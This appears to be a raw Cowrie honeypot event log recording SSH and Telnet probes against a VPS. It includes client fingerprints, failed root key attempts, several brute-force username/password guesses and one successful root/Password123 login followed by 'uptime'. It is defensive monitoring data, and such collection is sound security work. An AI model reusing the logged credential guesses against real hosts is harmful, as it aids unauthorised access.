{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-26T18:43:07.381536Z","src_ip":"212.227.235.229","session":"86d6bbc0fc7b"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"a2:30:0a:d0:dc:38:cc:e2:20:40:2b:7a:6f:9b:66:cd","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCij3spCwX6hfdqcYfHwnjOdF64hGzcguMOu+ixT6MNWOm6vTG2DEt8a+ApDgowKUPrZghGbN0wm91eKR3IopPjs2C6uBHWjIZEBOWFWAXdQC0fayJvHjZeQ8On4hkt7veVNimpwL5VITznX0pRYaQYpBbcB2WBlUbLJ8PAhFPYxMifhPtExOFwf84yUG8BnHAHzIkOj5YImBXHlevo5jvSsSP2aDeNLDm8wljRrsFo1oyYs4hW59YxW3CK3H1uzU6S1j2nHU63zaX64MoUosHI5twbC+WIRydmyGs4Igqqjf1U9W0jbOI6VZQBEebJqlMa402dNfsdUcnrvPtNT75d2i3m3FM6a5WKp29aSTpaTxI7tQVBelwN/0YZABUPkHAS2Hiw2iXTcvfjxn+HbthaFE18Wbj8XQJsnxOxBEdy+N/slSpLztHZGAncmZFmQz4hBEH6ywtZzuIsvxWlAmU981qjixixI1w87JBqHAtwHGA2Dz6XF+c4zQuHK+bkYKs=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint a2:30:0a:d0:dc:38:cc:e2:20:40:2b:7a:6f:9b:66:cd","sensor":"my-vps","timestamp":"2025-08-26T18:43:07.554251Z","src_ip":"212.227.235.229","session":"86d6bbc0fc7b"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"a2:30:0a:d0:dc:38:cc:e2:20:40:2b:7a:6f:9b:66:cd","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCij3spCwX6hfdqcYfHwnjOdF64hGzcguMOu+ixT6MNWOm6vTG2DEt8a+ApDgowKUPrZghGbN0wm91eKR3IopPjs2C6uBHWjIZEBOWFWAXdQC0fayJvHjZeQ8On4hkt7veVNimpwL5VITznX0pRYaQYpBbcB2WBlUbLJ8PAhFPYxMifhPtExOFwf84yUG8BnHAHzIkOj5YImBXHlevo5jvSsSP2aDeNLDm8wljRrsFo1oyYs4hW59YxW3CK3H1uzU6S1j2nHU63zaX64MoUosHI5twbC+WIRydmyGs4Igqqjf1U9W0jbOI6VZQBEebJqlMa402dNfsdUcnrvPtNT75d2i3m3FM6a5WKp29aSTpaTxI7tQVBelwN/0YZABUPkHAS2Hiw2iXTcvfjxn+HbthaFE18Wbj8XQJsnxOxBEdy+N/slSpLztHZGAncmZFmQz4hBEH6ywtZzuIsvxWlAmU981qjixixI1w87JBqHAtwHGA2Dz6XF+c4zQuHK+bkYKs=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T18:43:07.555045Z","src_ip":"212.227.235.229","session":"86d6bbc0fc7b"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"a2:30:0a:d0:dc:38:cc:e2:20:40:2b:7a:6f:9b:66:cd","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCij3spCwX6hfdqcYfHwnjOdF64hGzcguMOu+ixT6MNWOm6vTG2DEt8a+ApDgowKUPrZghGbN0wm91eKR3IopPjs2C6uBHWjIZEBOWFWAXdQC0fayJvHjZeQ8On4hkt7veVNimpwL5VITznX0pRYaQYpBbcB2WBlUbLJ8PAhFPYxMifhPtExOFwf84yUG8BnHAHzIkOj5YImBXHlevo5jvSsSP2aDeNLDm8wljRrsFo1oyYs4hW59YxW3CK3H1uzU6S1j2nHU63zaX64MoUosHI5twbC+WIRydmyGs4Igqqjf1U9W0jbOI6VZQBEebJqlMa402dNfsdUcnrvPtNT75d2i3m3FM6a5WKp29aSTpaTxI7tQVBelwN/0YZABUPkHAS2Hiw2iXTcvfjxn+HbthaFE18Wbj8XQJsnxOxBEdy+N/slSpLztHZGAncmZFmQz4hBEH6ywtZzuIsvxWlAmU981qjixixI1w87JBqHAtwHGA2Dz6XF+c4zQuHK+bkYKs=","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint a2:30:0a:d0:dc:38:cc:e2:20:40:2b:7a:6f:9b:66:cd","sensor":"my-vps","timestamp":"2025-08-26T18:43:07.641215Z","src_ip":"212.227.235.229","session":"86d6bbc0fc7b"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"a2:30:0a:d0:dc:38:cc:e2:20:40:2b:7a:6f:9b:66:cd","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCij3spCwX6hfdqcYfHwnjOdF64hGzcguMOu+ixT6MNWOm6vTG2DEt8a+ApDgowKUPrZghGbN0wm91eKR3IopPjs2C6uBHWjIZEBOWFWAXdQC0fayJvHjZeQ8On4hkt7veVNimpwL5VITznX0pRYaQYpBbcB2WBlUbLJ8PAhFPYxMifhPtExOFwf84yUG8BnHAHzIkOj5YImBXHlevo5jvSsSP2aDeNLDm8wljRrsFo1oyYs4hW59YxW3CK3H1uzU6S1j2nHU63zaX64MoUosHI5twbC+WIRydmyGs4Igqqjf1U9W0jbOI6VZQBEebJqlMa402dNfsdUcnrvPtNT75d2i3m3FM6a5WKp29aSTpaTxI7tQVBelwN/0YZABUPkHAS2Hiw2iXTcvfjxn+HbthaFE18Wbj8XQJsnxOxBEdy+N/slSpLztHZGAncmZFmQz4hBEH6ywtZzuIsvxWlAmU981qjixixI1w87JBqHAtwHGA2Dz6XF+c4zQuHK+bkYKs=","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T18:43:07.641881Z","src_ip":"212.227.235.229","session":"86d6bbc0fc7b"}
{"eventid":"cowrie.session.closed","duration":46.16500973701477,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:43:08.550391Z","src_ip":"123.31.39.100","session":"e35eb058c9a7"}
{"eventid":"cowrie.session.closed","duration":46.076831340789795,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:43:08.586638Z","src_ip":"212.227.235.229","session":"1450b3e5280d"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:43:17.294345Z","src_ip":"212.227.235.229","session":"86d6bbc0fc7b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36076,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c1c2c6d35ad","protocol":"ssh","message":"New connection: 212.227.125.160:36076 (1.2.3.4:22) [session: 9c1c2c6d35ad]","sensor":"my-vps","timestamp":"2025-08-26T18:43:34.245409Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:43:34.246071Z","src_ip":"212.227.125.160","session":"9c1c2c6d35ad"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T18:43:34.407652Z","src_ip":"212.227.125.160","session":"9c1c2c6d35ad"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:43:42.244618Z","src_ip":"212.227.125.160","session":"9c1c2c6d35ad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51792,"dst_ip":"1.2.3.4","dst_port":23,"session":"38f23eb22b09","protocol":"telnet","message":"New connection: 212.227.125.160:51792 (1.2.3.4:23) [session: 38f23eb22b09]","sensor":"my-vps","timestamp":"2025-08-26T18:44:20.389937Z"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":30638,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e4ffd66714f","protocol":"ssh","message":"New connection: 80.94.95.112:30638 (1.2.3.4:22) [session: 4e4ffd66714f]","sensor":"my-vps","timestamp":"2025-08-26T18:44:26.648641Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T18:44:26.649395Z","src_ip":"80.94.95.112","session":"4e4ffd66714f"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T18:44:26.680702Z","src_ip":"80.94.95.112","session":"4e4ffd66714f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"pingvin","message":"login attempt [admin/pingvin] failed","sensor":"my-vps","timestamp":"2025-08-26T18:44:26.882524Z","src_ip":"80.94.95.112","session":"4e4ffd66714f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"phrases","message":"login attempt [admin/phrases] failed","sensor":"my-vps","timestamp":"2025-08-26T18:44:27.917308Z","src_ip":"80.94.95.112","session":"4e4ffd66714f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"philipp","message":"login attempt [admin/philipp] failed","sensor":"my-vps","timestamp":"2025-08-26T18:44:28.950725Z","src_ip":"80.94.95.112","session":"4e4ffd66714f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"pass12","message":"login attempt [admin/pass12] failed","sensor":"my-vps","timestamp":"2025-08-26T18:44:29.983038Z","src_ip":"80.94.95.112","session":"4e4ffd66714f"}
{"eventid":"cowrie.login.failed","username":"admin","password":"pamel","message":"login attempt [admin/pamel] failed","sensor":"my-vps","timestamp":"2025-08-26T18:44:31.018133Z","src_ip":"80.94.95.112","session":"4e4ffd66714f"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:44:32.051771Z","src_ip":"80.94.95.112","session":"4e4ffd66714f"}
{"eventid":"cowrie.session.closed","duration":31.211955785751343,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:44:51.601826Z","src_ip":"212.227.125.160","session":"38f23eb22b09"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51006,"dst_ip":"1.2.3.4","dst_port":22,"session":"13910220fa62","protocol":"ssh","message":"New connection: 217.72.205.35:51006 (1.2.3.4:22) [session: 13910220fa62]","sensor":"my-vps","timestamp":"2025-08-26T18:45:32.028937Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:45:32.030087Z","src_ip":"217.72.205.35","session":"13910220fa62"}
{"eventid":"cowrie.session.connect","src_ip":"213.108.243.7","src_port":10557,"dst_ip":"1.2.3.4","dst_port":22,"session":"82d5a1c9821b","protocol":"ssh","message":"New connection: 213.108.243.7:10557 (1.2.3.4:22) [session: 82d5a1c9821b]","sensor":"my-vps","timestamp":"2025-08-26T18:45:43.053409Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:45:43.197080Z","src_ip":"213.108.243.7","session":"82d5a1c9821b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T18:45:43.197706Z","src_ip":"213.108.243.7","session":"82d5a1c9821b"}
{"eventid":"cowrie.login.success","username":"root","password":"Password123","message":"login attempt [root/Password123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T18:45:43.964602Z","src_ip":"213.108.243.7","session":"82d5a1c9821b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T18:45:44.368795Z","src_ip":"213.108.243.7","session":"82d5a1c9821b"}
{"eventid":"cowrie.command.input","input":"uptime","message":"CMD: uptime","sensor":"my-vps","timestamp":"2025-08-26T18:45:44.369472Z","src_ip":"213.108.243.7","session":"82d5a1c9821b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","size":69,"shasum":"dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:45:44.475587Z","src_ip":"213.108.243.7","session":"82d5a1c9821b"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:45:44.481329Z","src_ip":"213.108.243.7","session":"82d5a1c9821b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35212,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d0ae0be2df7","protocol":"ssh","message":"New connection: 212.227.235.229:35212 (1.2.3.4:22) [session: 7d0ae0be2df7]","sensor":"my-vps","timestamp":"2025-08-26T18:45:47.389870Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:45:47.390922Z","src_ip":"212.227.235.229","session":"7d0ae0be2df7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:45:47.625800Z","src_ip":"212.227.235.229","session":"7d0ae0be2df7"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:45:48.017618Z","src_ip":"212.227.235.229","session":"7d0ae0be2df7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47486,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2903e6b52c7","protocol":"ssh","message":"New connection: 212.227.235.229:47486 (1.2.3.4:22) [session: d2903e6b52c7]","sensor":"my-vps","timestamp":"2025-08-26T18:46:16.184109Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T18:46:16.185073Z","src_ip":"212.227.235.229","session":"d2903e6b52c7"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T18:46:16.399617Z","src_ip":"212.227.235.229","session":"d2903e6b52c7"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:46:24.184138Z","src_ip":"212.227.235.229","session":"d2903e6b52c7"}
{"eventid":"cowrie.session.connect","src_ip":"1.217.150.212","src_port":40600,"dst_ip":"1.2.3.4","dst_port":23,"session":"9548e5f7920b","protocol":"telnet","message":"New connection: 1.217.150.212:40600 (1.2.3.4:23) [session: 9548e5f7920b]","sensor":"my-vps","timestamp":"2025-08-26T18:47:13.215698Z"}
{"eventid":"cowrie.session.closed","duration":30.388853311538696,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T18:47:43.604486Z","src_ip":"1.217.150.212","session":"9548e5f7920b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60628,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf50edb0ecc2","protocol":"ssh","message":"New connection: 212.227.235.229:60628 (1.2.3.4:22) [session: bf50edb0ecc2]","sensor":"my-vps","timestamp":"2025-08-26T18:47:46.814954Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T18:47:46.815840Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T18:47:47.049807Z","src_ip":"212.227.235.229","session":"bf50edb0ecc2"}
